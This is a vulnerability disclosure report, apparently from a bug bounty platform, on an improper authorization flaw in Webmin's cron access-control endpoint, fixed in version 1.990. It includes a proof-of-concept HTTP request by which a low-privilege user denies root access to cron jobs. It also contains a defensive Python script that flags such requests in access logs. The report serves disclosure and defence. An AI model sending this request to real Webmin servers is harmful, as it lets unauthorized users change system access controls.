Improper Authorization in webmin/webmin

Status: Valid

Reported on Feb 17th 2022

Description

The /cron/save_allow.cgi endpoint is accessible to any authenticated low-privilege user, which lets such a user control which accounts may use cron jobs. They can allow or deny other users access to cron jobs, affecting the Scheduled Cron Jobs module.

Proof of Concept

Affected Endpoint:

GET http://{HOST}/cron/save_allow.cgi

Request

*** This example request denies the root user access to cron.

GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197

Impact

This vulnerability allows a low-privilege user to modify or restrict access to a system function outside that user's permitted limits.
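As an added defender-side example (not part of this report or of Webmin's own code), the script below scans access-log lines for /cron/save_allow.cgi requests issued by accounts outside an administrator list and pulls out the allow, deny and mode parameters seen in the request above. It assumes the log is in Common Log Format with the Webmin login name in the authuser field; the sample lines and the root-only administrator list are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (Common Log Format, login name in the
# authuser field). The second line mirrors the report's request.
SAMPLE_LOG = """\
192.0.2.10 - root [17/Feb/2022:10:01:02 +0000] "GET /cron/edit_allow.cgi?xnavigation=1 HTTP/1.1" 200 5120
192.0.2.23 - lowpriv [17/Feb/2022:10:03:44 +0000] "GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1" 302 0
192.0.2.23 - lowpriv [17/Feb/2022:10:04:10 +0000] "GET /cron/index.cgi HTTP/1.1" 200 8100
192.0.2.10 - root [17/Feb/2022:10:05:00 +0000] "POST /cron/save_allow.cgi HTTP/1.1" 302 0
"""

# CLF: client - authuser [timestamp] "METHOD target PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

ACL_ENDPOINT = "/cron/save_allow.cgi"


def find_cron_acl_changes(log_text, admins=("root",)):
    """Return one alert per ACL_ENDPOINT request made by a non-admin account.

    Each alert records who made the request, from where, and which
    allow/deny/mode values were submitted (blank when the request body
    was not logged, e.g. a POST).
    """
    alerts = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        if parts.path != ACL_ENDPOINT or m["user"] in admins:
            continue
        q = parse_qs(parts.query, keep_blank_values=True)
        alerts.append({
            "ip": m["ip"],
            "user": m["user"],
            "method": m["method"],
            "mode": q.get("mode", [""])[0],
            "allow": q.get("allow", [""])[0],
            "deny": q.get("deny", [""])[0],
            "status": int(m["status"]),
        })
    return alerts


if __name__ == "__main__":
    for a in find_cron_acl_changes(SAMPLE_LOG):
        print(f"ALERT {a['user']}@{a['ip']} {a['method']} {ACL_ENDPOINT} "
              f"mode={a['mode']!r} allow={a['allow']!r} deny={a['deny']!r} "
              f"status={a['status']}")
```

A 302 from this endpoint for a non-admin account indicates the change was accepted, which on a fixed build (1.990 or later per the timeline) should instead be rejected.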

Timeline

We are processing your report and will contact the webmin team within 24 hours (a year ago)
We have contacted a member of the webmin team and are waiting to hear back (a year ago)
webmin validated this vulnerability (a year ago)
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
webmin marked this as fixed in 1.990 with commit eeeea3 (a year ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE
save_allow.cgi#L5-L17 has been validated